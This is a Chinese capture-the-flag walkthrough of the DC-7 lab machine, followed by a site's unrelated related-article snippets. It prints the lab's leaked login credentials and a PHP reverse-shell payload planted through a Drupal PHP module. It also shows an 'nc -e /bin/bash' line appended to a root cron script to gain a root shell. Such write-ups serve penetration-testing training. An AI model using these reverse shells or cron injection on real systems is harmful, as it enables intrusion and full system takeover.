【DC系列07】DC-7靶机复盘

news2024/12/23 14:58:30

【DC系列07】DC-7靶机复盘

这个靶机同样是直接给ip的

image-20230706195145590

这个靶机在进入shell前是没有破绽的,并且进入主页面以后也并没有什么漏洞。如果不搜索一下这个靶机的解法很难去下一步操作。

在github.com上搜索dc7user然后选择code,里面可以找到dc7一个远程登陆的密码。

这个靶机应该就是想表达的就是源代码泄露漏洞,让你自己去搜索一些信息。

image-20230706195255017

同时我们利用dirsearch -u http://192.168.102.148扫描一下这个网站,发现一个登陆界面。

image-20230706212945474

image-20230706200027072

$username = "dc7user";
$password = "MdR3xOgB7#dW";

image-20230706200246546

远程登陆上以后发现一个mbox文件,打开发现这里面其实指向了一个文件,就是/opt/scripts/backups.sh文件,并且是每隔15分钟运行一次

image-20230706200444019

image-20230706200510734

我们查看一下这个文件,发现这是个root文件,并且www-data组的用户拥有全部权限。

image-20230706200608769

我们进入backups.sh的目录cat一下,发现里面执行了一些代码。

image-20230706202323584

同时我们在/var/mail下发现一个dc7user文件,这个文件显示了backups.sh每次执行的时间,每隔15分钟执行一次,并且发现了backup.sh执行的其他代码。

image-20230706202028258

image-20230706202119674

backup.sh每次执行的时候里面会运行一个drush命令,这个命令可以对drupal搭建的网站进行用户密码修改,我们可以利用重置密码这里来爆破用户名,当用户名正确的时候会发送电子邮件。

image-20230706211317429

确认用户名是admin时候可以直接利用drush进行一个密码修改,然后我们再登陆。

image-20230706202627636

image-20230706202554677

登陆后发现唯一可以写代码的地方不支持php代码,我们就想着装个php插件,让可以运行php代码。

image-20230706202930698

在Manage–Extend–List下面可以添加插件,这里面找了找没有关于php的插件,就需要我们自己从网上找到来添加。

image-20230706202941052

这是一个插件的地址,输入就可以了。

下载地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

image-20230706203333320

点击Install(安装)就按照成功了。

image-20230706203338249

再搜索PHP就找到PHP插件了,再点击Install。

image-20230706203452639

返回Manage–Content再点击Edit。

image-20230706203555703

发现这个可以插入代码的框框就可以输入PHP代码了,这时候我们插入一个PHP反弹shell。

image-20230706203607403

<?php
$ip='192.168.102.129';
$port='8888';
$sock = fsockopen($ip,$port);
$descriptorspec = array(
	0 => $sock, 
	1 => $sock, 
	2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

image-20230706203729679

添加保存成功后再点击运行一下这个页面,反弹shell就成功启动了。

image-20230706203749147

image-20230706203756654

这时候我们就进入到了www-data的shell下,找到刚才的backups.sh文件,往里面追加一条反弹shell。然后等待这个文件下次自己运行,如果自己运行就是以root权限运行的,返回的shell就是root权限的shell,而如果我们自己运行就是普通账户运行的,是不能返回root权限的。

echo "nc -e /bin/bash 192.168.102.129 8888“ >> backups.sh

image-20230706204038318

我们可以看到上次运行时间是22:15分,等到22:30就自动运行backups.sh这个文件了,我们也成功返回了root权限。

image-20230706204755149

image-20230706204537522

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/745451.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

WPS/Office Excel 方向键无法切换表格

问题&#xff1a;WPS/Office Excel 方向键无法切换表格。 分析&#xff1a;键盘开启了Scroll Lock&#xff0c;导致Excel开启了滚动锁定。滚动锁定如图: 解决&#xff1a;再次按下Scroll Lock键解锁即可。&#xff08;Scroll Lock键在键盘右侧上方。&#xff09;

CSS实现底部弧度效果

效果图如下 说明&#xff1a; 使用伪类处理&#xff0c;先将元素自身定位为relative; 伪类设置content:‘’&#xff0c;并相对定位为absolute&#xff0c;通过设置left ,top 值&#xff0c;改变width和和left来调节弧度。宽度需大于100%&#xff0c;将left设为&#xff08;100…

AWS 中文入门开发教学 48- S3 - 静态网站之王, 快速建立网站之首选

知识点 使用 S3 快速搭建静态网页网站使用 Route 53 服务解析网站域名实战演习 设计域名 Name: blog.deeplearnaws.ml建立同名的 S3 存储桶 上传网页文件到存储桶当中 ACL设置为所有人可读 设置存储桶为静态网站公开 进入属性,

索引相关操作

1、建立一个utf8编码的数据库test1 create database test1;2、建立商品表goods和栏目表category 按如下表结构创建表&#xff1a;存储引擎engine myisam 字符集charset utf8 mysql> desc goods;-------------------------------------------------------------| Field …

【试用科研好物】GPT辅助科研神器?AI助力科研?ChatPDF、有道速读

前言 近期需要阅读的论文很多&#xff0c;偶然间在微博刷到许多人推荐科研利器ChatPDF和有道速读。使用后的结论是不推荐使用&#xff0c;下面分别给出理由。 使用&评价 网页版&#xff0c;无需安装任何东西&#xff0c;两款都支持中文。 ChatPDF有道速读 下面太长不看…

vue项目优化问题

文章目录 1、常见的系统优化方案2、非常见的优化手段(但同样是很有用的)1、组件懒加载2、组件代码分割3、函数编译4、组件通讯 1、常见的系统优化方案 图片懒加载、图片压缩、路由组件按需加载(异步加载)、减少console、if判断、cdn加速、axios统一管理请求、v-if与v-show依据…

面试算法题—编程题2023

面试算法题—编程题2023 一、冒泡排序二、选择排序三、快速排序四、其它排序 最近在看一些面试题&#xff0c;发现很多面试过程中都会要求手写排序编程题&#xff0c;经过一番查找整理&#xff0c;可以快速学习和使用相关排序算法题&#xff0c;通俗易懂&#xff0c;手撕代码吊…

6月城市之星领跑活动获奖名单已出炉

经过一个月的角逐&#xff0c;6月城市之星领跑活动上榜名单终于出炉啦&#xff0c;本次城市赛道是根据最后登陆且6月份有入围博客之星用户的城市一共368个城市&#xff0c;城市人数划分区间具体情况如下&#xff1a; 200以上城市2个&#xff0c;其中有一些博主的城市由于未获取…

小程序测试笔记——你想知道的知识全都有

目录 1、你知道测试小程序跟普通的APP有什么异同么&#xff1f; 原生APP 小程序 2、你真真切切的了解什么是小程序么&#xff1f; 3、然后给你一个小程序&#xff0c;你要如何开展测试呢&#xff1f; 一、为什么要学习小程序测试? 二、微信小程序是什么? 概念&#xf…

FTP挂载网络磁盘

项目中使用存储阵列或NAS等网络存储作为文件存储地址&#xff0c;服务器与存储之间通过网络进行传输&#xff0c;当我把ftp指向的存储地址修改为网络磁盘时&#xff0c;会出现550等读取不到目录问题&#xff1b;以下为解决方案&#xff1a; 1.在服务器中新增windows用户&#x…

Vue3+Vite+Pinia+Naive后台管理系统搭建之五:Pinia 状态管理

前言 如果对 vue3 的语法不熟悉的&#xff0c;可以移步Vue3.0 基础入门&#xff0c;快速入门。 Pinia 详情可移步官网参看&#xff1a;Pinia 官网 1. 安装依赖 yarn add pinia // or npm install pinia 2. 构建 src/store/user.js // src/store/user.js import { defineSt…

fiddler在软件测试中的使用(详细版)

目录 1.抓包&#xff0c;辅助定位bug&#xff08;web中类似谷歌浏览器F12开发调试工具&#xff09; 1.1APP抓包分析 2.构建需要的测试场景&#xff08;通过拦截篡改接口的请求或返回&#xff09; 2.1断点篡改请求参数 2.1.1如果需要篡改请求参数&#xff0c;则需要在请求前…

IO流、IO模型

一、IO流分类 1.按照流的方向&#xff1a;输出流和输入流 2.按照流的角色&#xff1a;节点流和处理流 3.按照操作单元&#xff1a;字节流和字符流 二、基类 1.字节输入流和输出流&#xff1a; InputStream、OutputStream 2.字符输入流和输出流&#xff1a;Reader、Writer 三、为…

连锁门店运营管理系统有哪些?应该如何选择?

连锁门店运营管理过程中会面临很多难点&#xff0c;比如不同门店之间很难做到统一管理、销售数据无法实时同步、库存调拨效率低&#xff0c;很容易出现库存不足或过剩的情况... 选择一套合适的连锁门店管理系统&#xff0c;连锁店可以实时获得各个门店的销售、库存和其他关键数…

安达发|APS项目对企业有哪些要求?

尽管APS技术存在相当多的优点&#xff0c;但可以为企业带来其他IT技术以往所不及的收益和管理助力&#xff1b;但这是以APS项目成功部署并发挥作用为前提的。由于APS项目的特性要求较高&#xff0c;目前能够将APS技术运用于运筹和生产活动的企业还非常少。原因有很多&#xff0…

【CNN记录】pytorch中BatchNorm2d

torch.nn.BatchNorm2d(num_features, eps1e-05, momentum0.1, affineTrue, track_running_statsTrue, deviceNone, dtypeNone) 功能&#xff1a;对输入的四维数组进行批量标准化处理&#xff08;归一化&#xff09; 计算公式如下&#xff1a; 对于所有的batch中样本的同一个ch…

贯穿AI生命周期各阶段的道德问题:数据标注部分

随着AI在市场上得到更广泛的采用并被作为各种用例中的工具实现&#xff0c;更多的挑战也应势而生。AI项目遇到了一个长期的关键问题&#xff0c;即合乎道德的AI以及数据中的偏见处理。在AI发展初期&#xff0c;这个问题并不明显。 数据偏见是指数据集中某个元素的代表权重过大或…

Sui开发者网络、测试网和主网的异同之处

Sui在主网正式上线前&#xff0c;发布了两波测试网以及独立的开发者网络供开发者和项目方进行测试。主网与这些网络在部分功能和参数方面有些许不同&#xff0c;本文盘点了这三个网络在功能和参数方面的异同。查看网络信息及更新计划 验证节点集 Sui网络由一组独立的验证节点…

apk反编译检测代码是否混淆

把 apk 当成 zip 并解压&#xff0c;得到 classes.dex 文件&#xff08;有时可能不止一个 dex 文件&#xff0c;但文 件名大多类似&#xff09; 使用 dex2jar 执行如下命令&#xff1a; dex2jar.bat classes.dex 文件路径 得到 classes.dex.jar 然后使用 jd-gui 打开 jar 文件&…

CAN总线

目录 1. 总体概述  1.1 基本概念 1.2 通讯方式 1.3 为什么使用CAN? 1.4 CAN的协议及组成 2. 上帝视角看CAN的通讯过程 2.1 数据传输原理实现 2.3 通信的整个过程 2.2.1 空闲状态 2.2.2 开始数据传输 2.2.3 仲裁机制 2.2.4 位时序 2.2.5 一次数据传输的例子 3.…